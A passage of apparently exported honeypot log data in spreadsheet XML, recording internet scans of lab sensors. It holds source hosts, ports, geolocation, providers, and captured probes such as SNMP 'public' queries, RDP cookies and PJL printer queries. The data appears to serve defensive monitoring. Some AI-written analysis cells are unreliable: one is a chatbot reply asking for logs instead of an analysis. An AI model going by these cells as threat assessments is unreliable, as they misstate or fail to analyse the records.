    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;3306&amp;&amp;21&amp;&amp;63705&amp;&amp;3389&amp;&amp;161&amp;&amp;5900&amp;&amp;1080&amp;&amp;143&amp;&amp;9100&amp;&amp;1521&amp;&amp;63968&amp;&amp;1433&amp;&amp;6379&amp;&amp;110&amp;&amp;389&amp;&amp;NA&amp;&amp;5432&amp;&amp;445&amp;&amp;54997"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;request&amp;&amp;stshash&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TczuLLtAS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tDYRLW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qrrcOk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XStcsgkIT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MNARuq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XIZosU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZWwFVmUCm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FMEUhk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xGDjvs'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,57756)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,57758)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,57770)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,59174)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,59184)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,59192)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:1806"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Unauthorized access to a network management system using a default community string &quot;public&quot; for version 0 of the protocol. This is a common initial step in a larger attack, allowing attackers to gain access and move laterally within the network. It indicates an attempt to exploit the SNMP service."/>
    <s v="SNMP Scan"/>
  </r>
  <r>
    <x v="351"/>
    <x v="351"/>
    <s v="unassigned.172-81-60-58.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T20:29:38"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T20:29:38"/>
    <n v="407"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_DNS_H11&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;40296&amp;&amp;59278&amp;&amp;56001&amp;&amp;55666&amp;&amp;63546"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3c3a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="352"/>
    <x v="352"/>
    <s v="unassigned.172-81-62-75.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T20:28:30"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T20:28:30"/>
    <n v="542"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;17702&amp;&amp;53489&amp;&amp;63922&amp;&amp;60555&amp;&amp;54965&amp;&amp;53815&amp;&amp;60824&amp;&amp;63526"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3e4b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="353"/>
    <x v="353"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T20:28:02"/>
    <d v="2025-04-29T20:28:02"/>
    <d v="2025-04-29T20:28:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Lak Si"/>
    <s v="Khwaeng Thung Song Hong"/>
    <s v="1613187"/>
    <s v="NA"/>
    <s v="13.8941"/>
    <s v="100.584"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d18:5643"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="354"/>
    <x v="354"/>
    <s v="NA&amp;&amp;unassigned.172-81-62-82.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T20:27:35"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-29T20:27:35"/>
    <n v="396"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;59025&amp;&amp;51266&amp;&amp;63808&amp;&amp;51912&amp;&amp;55341&amp;&amp;62642&amp;&amp;54001&amp;&amp;63457&amp;&amp;53463&amp;&amp;59129&amp;&amp;61627&amp;&amp;58099&amp;&amp;64354"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3e52"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="355"/>
    <x v="355"/>
    <s v="NA&amp;&amp;unassigned.172-81-60-96.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T20:24:33"/>
    <d v="2024-12-12T13:02:35"/>
    <d v="2025-04-29T20:24:33"/>
    <n v="378"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H47"/>
    <s v="5900&amp;&amp;49456&amp;&amp;55701&amp;&amp;64485&amp;&amp;55450&amp;&amp;58256&amp;&amp;63602&amp;&amp;51618&amp;&amp;58035"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3c60"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="356"/>
    <x v="356"/>
    <s v="NA&amp;&amp;unassigned.142-202-189-29.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T20:23:32"/>
    <d v="2024-11-23T03:37:34"/>
    <d v="2025-04-29T20:23:32"/>
    <n v="438"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H30"/>
    <s v="5900&amp;&amp;60903&amp;&amp;53128&amp;&amp;53152&amp;&amp;57750&amp;&amp;50364"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8eca:bd1d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="357"/>
    <x v="357"/>
    <s v="zl-dala-us-gp1-wk121c.internet-census.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T20:11:41"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T20:11:41"/>
    <n v="184"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_IRC_H8&amp;&amp;SMA-LAB_DNS_H11&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_IRC_H10&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_POP3_H8&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_FTP_H4&amp;&amp;SMA-LAB_POSTGRES_H2&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_NTP_H41&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_MYSQL_H3&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;21&amp;&amp;6379&amp;&amp;6667&amp;&amp;53&amp;&amp;54273&amp;&amp;161&amp;&amp;110&amp;&amp;1521&amp;&amp;9100&amp;&amp;389&amp;&amp;NA&amp;&amp;23&amp;&amp;3306&amp;&amp;443&amp;&amp;25870&amp;&amp;5900&amp;&amp;29272"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TX"/>
    <s v="Texas"/>
    <s v="Dallas"/>
    <s v="Dallas"/>
    <s v="4684888"/>
    <s v="75270"/>
    <s v="32.7767"/>
    <s v="-96.797"/>
    <s v="21859"/>
    <s v="Zenlayer Inc"/>
    <s v="Zenlayer Inc"/>
    <s v="business"/>
    <s v="ICG 1 ZEN DFW"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;NA&amp;&amp;GET&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': 'vmi1469081.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 144.126.148.5:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9b4:8d0e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze."/>
    <s v="I need to see some log data to analyze. Can you provide it? I'll be happy to help identify the types of attacks based on the log entries!"/>
  </r>
  <r>
    <x v="358"/>
    <x v="358"/>
    <s v="NA&amp;&amp;crawler106.deepfield.net"/>
    <x v="0"/>
    <d v="2025-04-29T20:11:04"/>
    <d v="2024-12-20T18:10:48"/>
    <d v="2025-04-29T20:11:04"/>
    <n v="117"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_POSTGRES_H2&amp;&amp;SMA-LAB_FTP_HC1"/>
